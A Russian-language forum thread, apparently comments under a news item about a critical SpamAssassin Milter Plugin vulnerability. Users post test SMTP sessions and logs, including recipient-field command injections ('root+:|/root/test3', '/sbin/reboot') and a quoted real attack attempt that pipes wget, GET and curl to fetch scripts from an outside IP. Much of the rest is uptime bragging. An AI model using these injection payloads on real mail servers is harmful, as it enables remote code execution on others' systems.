Критическая уязвимость в SpamAssassin Milter Plugin

не работает sendmail[6982]: o2L9p2E3006900: to=/dev/null, ctladdr=root:+/sbin/reboot (8/0), delay=00:00:07, xdelay=00:00:00, mailer=*file*, pri=30310, dsn=2.0.0, stat=Sent

разумеется неработает..

Саныч постарался.. :-)

Ну я так понимаю, прежде всего МТА должен исполняться с правами root, чтобы код от рута исполнить?

Далее, EXIM:

root@mail:~# cat /root/test3
#!/bin/bash
echo 1 > /root/mailtest
root@mail:~# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220-Welcome on our mail server!
220-This system does not accept Unsolicited Commercial Email
220-and will blacklist offenders via our spam processor.
220-Have a nice day!
220-
220 domain.ru ESMTP
helo domain.ru
250 domain.ru Hello localhost [127.0.0.1]
mail from: root@domain.ru
250 OK
rcpt to: root+:|/root/test3
501 root+:|/root/test3: missing or malformed local part (expected word or «<»)
^]
telnet> quit
Connection closed.
root@mail:~# cat /root/mailtest
cat: /root/mailtest: No such file or directory
root@mail:~#

> да настройте уже нормально свои MTA!

Тут прозвучала правильная идея - изучить, как работает milter. каллбэки вызываются не после, а во время отработки. Я только сейчас не помню, до соответствующей стадии, или после. Может быть до.

> exim 4.69-28.1

spamassassin 3.2.4-29.1

Где здесь spamassassin milter plugin ? :-)

Я думаю только ленивые не настроили правильно. Но в этом случае так им и надо.

> Я только сейчас не помню, до соответствующей стадии, или после. Может быть до.

В смысле, до или после правил MTA на соответствующей стадии. Если до, все эти «настрой МТА правильно» не прокатят.

Время пиарить http://puszcza.gnu.org.ua/software/mailfromd/
:-)

>uptime 2 дня 19 часов. + мультимедиа что лин не осилит

О, пошло мерянье [s]пись[/s] аптаймом.

Вантуз осилит аптайм 402 дня 19 часов (and counting) + сервер много-чего + рутер + периодическая компиляция (ибо Gentoo) ?

root@mail:~# cat /etc/slackware-version
Slackware 11.0.0
root@mail:~# uptime
12:03:43 up 411 days, 19:00, 1 user, load average: 0.02, 0.06, 0.09
root@mail:~#

Учитесь, сэр!

# cat /etc/slackware-version
7.1.0
# uptime
Unknown HZ value! (0) Assume 100.
12:38pm up 531 days, 3:15, 2 users, load average: 0.00, 0.00, 0.00
#

12:03:43 up 411 days, 19:00, 1 user, ***load average: 0.02, 0.06, 0.09***
12:38pm up 531 days, 3:15, 2 users, ***load average: 0.00, 0.00, 0.00***

Засуньте свои аптаймописькомерки с таким LA обратно в свои кладовки и ещё пару лет про них не вспоминайте

SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected «rcpt to: root+:»|wget http://61.100.185.177/busy-1.php«» H=(bluedick) [68.236.170.186] I=[my-ip]:25 next input=«rcpt to: root+:»|GET http://61.100.185.177/busy-2.php«\r\nrcpt to: root+:»|curl http://61.100.185.177/busy-3.php«\r\ndata\r\n.\r\nquit\r\n»

правда спамасасина нету

Ну это вы зря. :) Поскольку серверок почтовый, у него очень хорошо плавает LA.

Самое высокое - по утрам, когда все юзверята одновременно приходят и начинают качать накопленную за ночь эту нашу почту. Там ЛА доходит до 20.

Вообще, серверок обрабатывает в среднем где-то 150-200 писем в минуту (то есть, 2-4 письма в секунду).

> Засуньте свои аптаймописькомерки с таким LA обратно в свои

кладовки и ещё пару лет про них не вспоминайте

А вот не надо допускать большой LA. ;-) Максимум - это количество ядер. Если регулярно превышает - это сигнал к апгрейду.

> 12:03:43 up 411 days, 19:00, 1 user, load average: 0.02, 0.06, 0.09
root@mail:~#

Учитесь, сэр!

Да ладно...
18:02:52 up 452 days, 2:29, 4 users, load average: 0.19, 0.23, 0.19

;-)

> Максимум - это количество ядер.
Спасибо, капитан, я в курсе

***load average: 0.00, 0.00, 0.00***

Сколько здесь ядер?

Можно съэкономить выключив этот сервер!